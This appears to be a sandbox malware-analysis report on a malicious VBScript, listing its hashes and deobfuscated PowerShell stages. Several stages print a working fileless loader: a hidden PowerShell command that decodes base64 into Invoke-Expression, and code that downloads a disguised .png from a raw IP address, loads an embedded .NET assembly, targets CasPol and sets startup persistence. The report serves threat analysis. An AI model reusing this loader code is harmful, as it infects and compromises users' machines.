Malicious

d004101a2a747c086835148e400462f7

VBScript | MD5: d004101a2a747c086835148e400462f7 | Size: 26.96 KB | text/vbscript

Infection Chain
Characteristics
MD5: d004101a2a747c086835148e400462f7
Sha1: a7f445c5b9ecf11234474e74b623351d052f8596
Sha256: 5728fe1fbdd76d4b0ddb5e3cacb1aab8ccdaa03e6b53d497255eb24926f0ea67
Sha384: 2a5156b18b58a235ea15600b773badfaa14f0fbb01859cbf04b379fd8df0c814657db2e4d0e51b814697c9f6dedab6d0
Sha512: 3a26baaa449b6938abcc0648abfd079b6f5b24cedbd1ae35d52fb03bb6e45b497779726a6a400b2c288889a5576d90201500ea0a42cf946c0352cf09e895084c
SSDeep: 384:duMBjmqhD09v1TBkg44BS9kWIkeLdIoenFm9H4XLSnRHvtCFinZeC7T9r7n:o6aqhD09v1TBR/AYLvDH+LhwZeC7T5n
TLSH: C0C2C767FF0963788B02674A9E0D12299D6412A31A339978FF3DC56F0F2743597B4E88

d004101a2a747c086835148e400462f7 (26.96 KB)

File Structure

Characteristics
No malware configuration was found at this point.

Artefacts

URLs in VB Code - #1
http://www.ostrosoft.com/smtp.html
Location: d004101a2a747c086835148e400462f7

Deobfuscated PowerShell (Malicious)
powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[base64 block removed]')) | Invoke-Expression"
Location: d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell (Malicious)
Invoke-Expression
Location: d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command]

Deobfuscated PowerShell (Malicious)
Invoke-Expression
Location: d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]

Deobfuscated PowerShell (Malicious)
$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Location: d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block]

Deobfuscated PowerShell (Malicious)
$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Location: d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]

Deobfuscated PowerShell (Malicious)
powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[base64 block removed]')) | Invoke-Expression"
Location: d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]

Deobfuscated PowerShell (Malicious)
Invoke-Expression
Location: d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]
